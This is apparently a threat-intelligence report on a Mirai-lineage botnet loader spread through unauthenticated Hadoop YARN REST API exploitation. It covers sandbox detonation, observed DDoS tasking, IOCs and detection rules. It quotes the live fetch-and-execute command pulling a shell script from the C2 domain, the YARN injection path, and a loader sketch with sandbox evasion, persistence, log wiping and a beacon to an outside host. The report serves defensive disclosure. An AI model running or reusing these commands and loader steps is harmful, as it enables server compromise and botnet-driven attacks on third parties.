MICROC2 — cross-platform botnet loader
Mass Hadoop YARN RCE exploitation wave delivering a Mirai-lineage cross-platform loader, with confirmed live C2 tasking and a volumetric flood attack observed in sandbox
Executive summary
One IP hit six of our sensors twice in under two hours through an unauthenticated Hadoop API endpoint most defenders have never had reason to think about. The loader it planted didn't just sit there. We put the payload in a sandbox and watched it stay in contact with its command server for days, taking orders six separate times and cycling through four different attack techniques.
wget -qO- http://ssh.microc2.lol/static/js/chunk.sh | sh. This loader fingerprints the target architecture, including Android and rooted-device paths, then fetches a matching cross-platform ELF payload and installs it with sandbox evasion, multi-vector persistence, and anti-forensic cleanup. We detonated the x86_64 payload in a sandbox, first for 12 hours and then for an extended 72 hours. Both runs confirmed a live, actively-tasked command-and-control channel. Across them, the C2 ordered the bot into six separate volumetric floods against six unrelated third-party hosts, using four distinct attack techniques: a TCP garbage-payload flood (twice), a high-intensity raw UDP flood, a malformed/flagless TCP connection-flood, and a legitimate SYN-flag connection-flood (twice).
VirusTotal community data (queried 2026-07-03) shows the C2 domain was registered 2026-05-24, about four weeks before this exploitation wave, and is already flagged malicious by 9 of 91 engines. The C2 IP itself carries a negative community reputation and was independently re-scanned by VirusTotal multiple times in the days following our sandbox detonation (most recently 2026-07-03 09:06 UTC). That's active, concurrent tracking by the wider security community, even though we found no named public write-up of this specific campaign. The captured binary sample itself had never previously been submitted to VirusTotal. We submitted it as part of this investigation; engine results are pending.
Threat actor profile
No named threat actor or public campaign write-up was found matching this loader's tradecraft, C2 domain, or binary-naming convention. The operator has not been attributed.
sdfjgnjsdf.<arch>) reads as an unedited builder default rather than deliberate branding, and the fake systemd unit is copy-paste boilerplate ("Network Time Sync"). This is consistent with a mid-tier, semi-mature operator running an off-the-shelf or lightly-customized Mirai-derivative builder rather than bespoke development.
| Attribute | Assessment | Confidence |
|---|---|---|
| Motivation | DDoS capability / DDoS-for-hire — confirmed volumetric flood capability, no crypto-mining or credential-theft behavior observed | HIGH |
| Sophistication | Intermediate — complete evasion/persistence/anti-forensics feature set and at least four independently-triggerable attack modules (TCP garbage-payload flood, raw UDP flood, malformed/flagless TCP connection-flood, legitimate SYN-flag connection-flood), but generic/unedited artifacts suggest a builder, not custom engineering | HIGH |
| Attribution | Unknown; no named threat actor or public research found | MED |
| Target profile | Opportunistic, exploit-driven — Internet-wide scanning for unauthenticated Hadoop YARN REST APIs, payload targets Linux (x86/x86_64/MIPS/ARM/PPC/SH4) and rooted Android devices | HIGH |
| Operational tempo | Single confirmed exploitation wave against our fleet (2026-06-18, two sub-waves ~105 min apart), but the C2 itself stayed active for days afterward — see Sandbox Detonation below for the full attack-by-attack breakdown | HIGH |
Infrastructure analysis
Exploitation wave (2026-06-18)
| Timestamp (UTC) | Sensor | Vector |
|---|---|---|
| 15:20:58 | Sensor A | Hadoop YARN RCE, port 8088 |
| 15:24:38 | Sensor B | Hadoop YARN RCE, port 8088 |
| 15:24:44 | Sensor C | Hadoop YARN RCE, port 8088 |
| 15:25:50 | Sensor D | Hadoop YARN RCE, port 8088 |
| 15:28:11 | Sensor E | Hadoop YARN RCE, port 8088 |
| 15:28:18 | Sensor F | Hadoop YARN RCE, port 8088 |
| 17:05:49 | Sensor B | Hadoop YARN RCE, port 8088 (repeat) |
| 17:05:53 | Sensor C | Hadoop YARN RCE, port 8088 (repeat) |
| 17:07:00 | Sensor D | Hadoop YARN RCE, port 8088 (repeat) |
| 17:09:30 | Sensor E | Hadoop YARN RCE, port 8088 (repeat) |
| 17:09:37 | Sensor F | Hadoop YARN RCE, port 8088 (repeat) |
All 11 events carried the identical shell command. The 105-minute gap between the first and second sub-wave, hitting five of the same six sensors again, suggests either a retry pass by the same scanning infrastructure or a second thread of the same scan-and-exploit tool working through an overlapping target list.
Command and control
94.154.43.46 — confirmed live via sandbox detonation. Port 80 served an initial GET /proxies.txt request (404, Apache/2.4.6 CentOS banner). Port 1337 carried a persistent raw-TCP session with the bot, exchanging 1–2 byte heartbeats roughly every 60 seconds from check-in. WHOIS attributes the netblock to a Kharkiv, Ukraine-based reseller; VirusTotal flags the IP 8 malicious / 2 suspicious of 91 engines with a reputation score of −1, and it was independently re-scanned by VirusTotal multiple times in the days following our detonation (most recently 2026-07-03 09:06 UTC).
| IP / Domain | Role | Port(s) | VT Detections | Notes |
|---|---|---|---|---|
ssh.microc2.lol |
Loader + payload host | 80 | 9 / 91 | Registered 2026-05-24; Cloudflare-fronted; PublicDomainRegistry.com |
94.154.43.46 |
C2 / same host as loader | 80, 1337, 8080 | 8m + 2s / 91 | Reputation −1; re-scanned by VT repeatedly since our detonation (most recently 2026-07-03 09:06 UTC) |
Malware analysis
Loader script
POSIX shell, ~4.5 KB. Performs, in order: sandbox/container evasion (checks /proc/version for "microsoft", /proc/vz, /.dockerenv — exits silently if any match), competitor-process eviction by name, target-architecture detection (including Android markers /system/bin/linker[64]), payload download, process masquerading, four-vector persistence installation, log/history cleanup, and self-deletion.
Payload binary
| Architecture | Filename | Notes |
|---|---|---|
| x86_64 | sdfjgnjsdf.x86_64 | Detonated in sandbox — see below |
| x86 | sdfjgnjsdf.x86 | Not yet detonated |
| ARM (v4–v7) | sdfjgnjsdf.arm[5|6|7] | Not yet detonated |
| MIPS / MIPSel | sdfjgnjsdf.mips / .mpsl | Not yet detonated |
| PPC / SuperH | sdfjgnjsdf.ppc / .sh4 | Not yet detonated |
Static binary analysis
upx -d) recovers a statically-linked, symbol-stripped ELF consistent with a musl-libc-style build: self-contained syscall stubs and a self-contained DNS resolver, unlike glibc's NSS-dependent static binaries. It goes from 64,392 bytes packed to 171,672 bytes unpacked.
Disassembling the unpacked binary confirms it implements networking via direct Linux syscalls rather than higher-level libc socket APIs — consistent with the minimal-footprint, hand-rolled style typical of Mirai-derivative flooders. The relevant syscall wrapper functions were located and verified against their actual Linux x86-64 syscall numbers:
; objdump -d (unpacked, UPX-stripped) -- socket() wrapper, verified syscall #41 (0x29)
4149f8: 53 push %rbx
4149f9: 48 63 d2 movslq %edx,%rdx
4149fc: 48 63 f6 movslq %esi,%rsi
4149ff: 48 63 ff movslq %edi,%rdi
414a02: b8 29 00 00 00 mov $0x29,%eax ; 41 = __NR_socket
414a07: 0f 05 syscall
; connect() wrapper, verified syscall #42 (0x2a)
41485c: 53 push %rbx
41485d: 89 d2 mov %edx,%edx
41485f: 48 63 ff movslq %edi,%rdi
414862: b8 2a 00 00 00 mov $0x2a,%eax ; 42 = __NR_connect
414867: 0f 05 syscall
The same technique confirmed bind (#49), accept (#43), recvfrom (#45), recvmsg (#47), sendmsg (#46), sendto (#44), setsockopt/getsockopt (#54/#55), and shutdown (#51) all present as real, callable code — a full raw-socket toolkit, not just the subset we happened to observe in two sandbox runs. socket() is the single most-called function in the entire binary (48 call sites), consistent with a bot that opens many short-lived connections rather than reusing one.
Static analysis also turned up a capability we have not observed used: a full DNS-resolution routine (IPv4 and IPv6 aware, port 53, retry logic with randomized transaction IDs), musl's standard hostname-resolution machinery. Every C2 interaction we've captured uses the hardcoded IP 94.154.43.46 directly, so this is dormant capability, not active behavior. It means the operator could redirect the botnet to a new C2 by simply changing a resolvable hostname in a future build, without needing to patch this networking logic.
Domain intelligence — microc2.lol
| Attribute | Value |
|---|---|
| VT detections | 9 / 91 |
| Reputation | 0 |
| Created | 2026-05-24 |
| Last VT analysis | 2026-07-03 |
| Registrar | PDR Ltd. d/b/a PublicDomainRegistry.com |
| Nameservers | Cloudflare (vin.ns.cloudflare.com, ariella.ns.cloudflare.com) |
| WHOIS registrant | Likely-fabricated identity — registrant name, Chicago IL street address, and contact email at a throwaway domain with a numeric-suffixed username; not privacy-proxied at the registrar level, but not attributable either |
The domain's creation date (2026-05-24) falls roughly four weeks before the exploitation wave against our fleet — consistent with infrastructure stood up specifically to support this campaign rather than long-lived, reused C2.
Sandbox detonation
We ran the x86_64 payload twice: a 12-hour window first, then a 72-hour re-run once it was clear the C2 was still handing out orders. Between the two runs the bot got tasked six times against six different targets, cycling through four distinct attack techniques (one of them repeated back-to-back against two targets in the same session). We also missed one of the early attacks while it was happening — caught it only on a full pcap review after the fact, a mistake documented below alongside how we changed our monitoring afterward.
94.154.43.46 within seconds each time, and a persistent heartbeat channel on port 1337 was established immediately and remained active throughout both runs. This is an actively operated C2, not dormant or abandoned infrastructure.
12-hour run — attack #1
Roughly 51 minutes after check-in (~20:18 UTC), the C2 pushed a 34-byte command, the first payload larger than a routine 1–2 byte heartbeat observed on that channel. The bot began attacking a third-party target roughly 55 milliseconds later. Full TCP stream reassembly of the resulting traffic shows the bot opened 96 connections to target 1 (AS16276, OVH SAS):25568 over roughly three minutes. Each connection sent a fake GET / HTTP/1.1 request with a Host: localhost header (likely a template/decoy artifact rather than a functional HTTP client), followed by high-entropy binary data in chunks up to 1460 bytes. Across the full attack window, 100% of application payload flowed from the bot to the target (14.2 MB across 17,218 TCP segments); the target never sent data back beyond bare TCP acknowledgments. This is a garbage-payload / bandwidth-exhaustion flood, not an HTTP request-rate flood. A second, identical 34-byte command arrived 34 seconds after the first, within the same attack window.
12-hour run — attack #2
target 2 (AS214833, PR Obrada Podataka Castles Novi Sad) on two ports. Port 22 (SSH) drew 1,683 SYN packets: 500 distinct connection attempts, each retried ~3x by the bot's own TCP stack. Every one of those 500 attempts eventually drew a TCP reset from the target, but in a single synchronized batch starting 1m14s after the first attempt, not immediately, which points to a stateful firewall or rate-limiter rather than a silently-dropping service. Port 1 (tcpmux) answered immediately and received the same garbage-flood technique as Attack #1: a 71-byte decoy HTTP header followed by high-entropy binary chunks, with heavy retransmission of the header itself (up to 258x for a single connection). That retransmission pattern again points to the target's connection-tracking state misbehaving under load rather than a clean one-way flood. Over roughly 6 minutes, the bot pushed 12,725 data segments (10.4 MB, 0 bytes returned) across 29,441 total packets on the two ports combined, a larger episode than Attack #1 by both packet count and duration.
| Metric | Attack #1 | Attack #2 |
|---|---|---|
| Time to tasking | ~51 min from check-in | ~11h13m from check-in |
| Target | AS16276 (OVH SAS), port 25568 | AS214833 (Novi Sad), ports 22 + 1 |
| Duration | ~3 minutes (96 connections) | ~6 minutes (29,441 packets) |
| Data delivered | 14.2 MB / 17,218 segments | 10.4 MB / 12,725 segments |
| Data returned by target | 0 bytes (ACKs only) | 0 bytes (ACKs only) |
Outside these two windows, the C2 channel carried only routine heartbeat traffic (1–2 bytes, ~60s interval) and occasional short bursts of small (1–4 byte) protocol chatter with no associated external connections, likely status/sync exchanges rather than tasking. No DNS traffic was observed at any point in the 12-hour run; the bot uses a hardcoded C2 IP throughout.
| Metric | Value |
|---|---|
| boot / login / exec | true / true / true |
| exit_kind | killed (normal timeout reap at full 12h budget, not a crash) |
| C2 channels observed | 80 (initial fetch), 1337 (persistent), 8080 (beacon) |
| Attack commands observed | 2 distinct tasking events, 2 different targets |
| Total pcap captured | 29.9 MB |
| DNS queries | 0 |
72-hour re-run — attack #3: a different technique
| Metric | Value |
|---|---|
| Time to tasking | ~2 hours from check-in |
| Target | AS11504 (The Cloud Minders, Inc.), port 80/udp |
| Technique | Raw UDP flood — fixed src/dst port, one-way, no handshake |
| Duration | 10.01 seconds |
| Data delivered | 13.2 MB / 9,036 packets (1,458 B each) |
| Peak rate | ~1.3 MB/s — highest bandwidth of all six attacks by far |
72-hour re-run — attack #4: a third technique
target 4 on port 22 (SSH) over roughly 5 seconds. Each packet carried TCP options normally only seen on a SYN (MSS, SACK-permitted, timestamps, window scale), but the flags byte itself was entirely zero, meaning no control bits were set, not even SYN. That could be a deliberate evasion technique built to slip past naive SYN-flood detection, or it could be a packet-crafting bug in a raw-socket flood module. Either way, it's a distinct code path from the other two techniques. The target answered every one of the 3,400 attempts with a TCP reset, for 6,800 packets and roughly 398 KB total: a tiny fraction of Attacks #1–3's data volume, consistent with a connection/state-exhaustion attempt against a specific service rather than a bandwidth flood.
| Metric | Value |
|---|---|
| Time to tasking | ~6h16m from check-in |
| Target | AS215925 (Vpsvault.host Ltd), port 22/tcp |
| Technique | Malformed/flagless crafted TCP packets, one per source port — no SYN bit set despite SYN-only options |
| Duration | ~5 seconds |
| Data delivered | ~398 KB / 6,800 packets (3,400 sent + 3,400 RST replies) |
| Peak rate | ~680 packets/sec — a connection-attempt flood, not a bandwidth flood |
72-hour re-run — attacks #5 and #6: a fourth technique, two targets back to back
target 5 on port 22 (SSH), and the target answered every single one immediately with a clean TCP reset — no delay, no batching, unlike Attack #2's misbehaving target. The window ran about 3 minutes 20 seconds. Roughly 6 minutes 33 seconds after that first push, on the same C2 session, a second 32-byte command tasked the bot against a different target: 48 connection attempts to target 6, also on port 22, also answered immediately and individually with a clean reset. Both attacks total under 400 packets combined and deliver essentially no payload bytes; like Attack #4, this reads as a connection/state-exhaustion technique rather than a bandwidth flood, but unlike Attack #4 it uses textbook TCP semantics instead of a malformed packet. Notably, target 6 sits on the same hosting provider (AS214833, PR Obrada Podataka Castles Novi Sad) as Attack #2's target — the second time this C2 has directed traffic at that same provider.
| Metric | Attack #5 | Attack #6 |
|---|---|---|
| Time to tasking | ~7h24m from check-in | ~7h30m from check-in (6m33s after Attack #5's push) |
| Target | AS201279 (Loginov Vladislav), port 22/tcp | AS214833 (Novi Sad — same provider as Attack #2), port 22/tcp |
| Technique | Legitimate SYN-flag connection-flood, one connection attempt per source port, target resets each individually and immediately | |
| Duration | ~3m20s | ~1m46s |
| Data delivered | 320 SYNs + 320 RST replies (640 packets) | 48 SYNs + 48 RST replies (96 packets) |
Target fingerprints
| Attribute | Target 1 (Attack #1) | Target 2 (Attack #2) | Target 3 (Attack #3) | Target 4 (Attack #4) | Target 5 (Attack #5) | Target 6 (Attack #6) |
|---|---|---|---|---|---|---|
| Port(s) | 25568 | 22, 1 | 80/udp | 22 | 22 | 22 |
| ASN | AS16276 | AS214833 | AS11504 | AS215925 | AS201279 | AS214833 |
| Hosting provider | OVH SAS | PR Obrada Podataka Castles Novi Sad | The Cloud Minders, Inc. | Vpsvault.host Ltd | Loginov Vladislav | PR Obrada Podataka Castles Novi Sad (same as Target 2) |
| VT detections | 0 / 91 (IP withheld) | 0 / 91 (IP withheld) | 3m + 1s / 91 (IP withheld) | 5m + 5s / 91 (IP withheld) | 0 / 91 (IP withheld) | 0 / 91 (IP withheld) |
| Last VT analysis | 2025-05-15 (stale — not actively tracked as malicious) | Never previously scanned | Same day as attack, ~10h prior | Same day as attack, ~16.5h prior | Same day as attack, ~3h20m prior | ~3 months prior (stale) |
| Our own scan | Passive-only, 0 open ports found | Not yet scanned | Not yet scanned | Not yet scanned | Not yet scanned | Not yet scanned |
Targets 1, 2, 5, and 6 show no VirusTotal detections and, apart from Target 6's stale scan, no recent history — consistent with incidental targets rather than known-malicious infrastructure. Targets 3 and 4 are the exceptions: both already carry multiple VT detections, last analyzed within a day of our observed attacks. That means either the community was already tracking these IPs as suspicious, or the C2 preferentially selected targets already flagged for unrelated reasons. Target 6 is also notable for a different reason: it sits on the exact same hosting provider (AS214833) as Target 2, the only repeat provider across all six targets — everything else sits on unrelated ASNs in different countries, which argues against any of them being the same actor's own infrastructure. It's more consistent with arbitrary DDoS-for-hire targets tasked by whoever controls this C2. IPs withheld; ports and hosting details retained for defenders correlating against their own logs.
Observed TTPs — MITRE ATT&CK
.ntpd; fake systemd unit "Network Time Sync"Activity timeline
microc2.lol registered via PublicDomainRegistry.com, fronted by Cloudflare.94.154.43.46 (ports 80 and 1337).target 1 (AS16276, OVH SAS):25568 roughly 55 milliseconds later.exit_kind: killed, full exec-time budget used). Final pcap: 29.9 MB. Report updated with both confirmed attacks.Exploit payload
Hadoop YARN ResourceManager unauthenticated RCE (port 8088)
The Hadoop YARN ResourceManager REST API, when exposed without authentication, allows any client to submit a new "application" whose launch-context command is executed by the ResourceManager itself. This is a long-documented misconfiguration (not a CVE-numbered vulnerability) that has been mass-exploited since at least 2018 by botnets including DemonBot and various Mirai derivatives. The captured payload delivery command:
wget -qO- http://ssh.microc2.lol/static/js/chunk.sh | sh
was observed injected via the standard YARN new-application submission flow (/ws/v1/cluster/apps/new-application → /ws/v1/cluster/apps, with the command embedded in am-container-spec.commands.command), identical across all 11 captured events.
Loader behavior summary
# Sandbox/container evasion — exits silently if any match
grep -qi "microsoft" /proc/version || [ -d /proc/vz ] || [ -f /.dockerenv ]
# Competitor eviction (not self)
kill -9 $(ps | grep -E '(zaksmdfasdf|sora|vmlinuz|moe|dota|x86_64|bash.mips)' | grep -v $$ | awk '{print $1}')
# Architecture fingerprint incl. Android
[ -f /system/bin/linker64 ] && echo "sdfjgnjsdf.arm7" # Android
[ -f /lib64/ld-linux-x86-64.so.2 ] && echo "sdfjgnjsdf.x86_64"
# ...case fallback on `uname -m` for mips/mpsl/ppc/spc/m68k/sh4/arm[4-7]
# Fetch + masquerade
wget/curl/tftp "$BASEURL/$binary" -O "$binary"
cp "$binary" ".ntpd"; "./.ntpd" "$binary" &
# Persistence — crontab, rc.local, init.d, systemd (fake "Network Time Sync")
# Anti-forensics — clear HISTFILE, bash/zsh/sh history, auth.log/secure
# Self-delete: rm -f "$0"
# Beacon: wget -qO- "http://$SRV:8080/+?arch=$binary"
Indicators of compromise
Network IOCs
File IOCs
| SHA256 | Filename | Type | VT Status |
|---|---|---|---|
6abf0b2cfee342e686454b83371b2148bcecbd7a1c453a08468fa41a9713264a |
sdfjgnjsdf.x86_64 |
ELF 64-bit LSB executable, x86-64, UPX-packed | Pending |
Filesystem artifacts
.ntpd — masquerade copy of the payload binary in the working directory/etc/systemd/system/ntpd.service — fake unit, description "Network Time Sync"/etc/init.d/ntpd — SysV-style persistence on systems without systemdOutbound TCP to
94.154.43.46 on ports 80, 1337, or 8080Cleared or truncated
/var/log/auth.log, /var/log/secure, or shell history with no corresponding legitimate admin action
Mitigations and detection
| Action | Priority | Detail |
|---|---|---|
| Disable unauthenticated YARN REST API | HIGH | Never expose Hadoop YARN ResourceManager (port 8088) to the Internet without authentication. Enable Kerberos or restrict to a trusted internal network. |
| Block C2 infrastructure | HIGH | Block outbound traffic to 94.154.43.46 and DNS resolution of microc2.lol at the perimeter. |
| Hunt for masquerading persistence | MED | Audit systemd units and init scripts named ntpd against the real NTP daemon's expected binary path and behavior. |
| Monitor for cleared logs | MED | Alert on unexpected truncation of auth.log/secure or shell history clearing outside maintenance windows. |
Detection signatures
# Suricata/Snort — YARN RCE exploitation attempt
alert http any any -> $HOME_NET 8088 (msg:"MICROC2 Hadoop YARN unauthenticated RCE attempt"; \
content:"am-container-spec"; http_client_body; \
content:"microc2.lol"; http_client_body; \
flow:established,to_server; sid:9920001; rev:1;)
# Suricata/Snort — loader payload delivery
alert http any any -> any any (msg:"MICROC2 loader download"; \
content:"/static/js/chunk.sh"; http_uri; \
content:"microc2.lol"; http_header; \
flow:established,to_server; sid:9920002; rev:1;)
# Suricata — outbound C2 beacon
alert tcp $HOME_NET any -> 94.154.43.46 [80,1337,8080] (msg:"MICROC2 C2 beacon"; \
flow:established,to_server; sid:9920003; rev:1;)
Collection methodology
All data in this report was collected organically by a distributed SSH/Telnet honeypot fleet deployed across multiple cloud providers and geographic regions. Fleet nodes also run alternate-protocol lure daemons that capture exploitation attempts against commonly-targeted services beyond SSH/Telnet, including the unauthenticated Hadoop YARN REST API used in this campaign.
The payload was fetched by the fleet's automated pipeline shortly after first capture and again at later dates as part of routine indicator re-validation. The x86_64 sample was detonated in an isolated sandbox environment with network egress routed through a residential-style VPN for realistic network conditions; no interaction with victim networks occurred beyond passive observation of traffic the sample itself generated. VirusTotal domain, IP, and file lookups were performed via the fleet's own investigation tooling.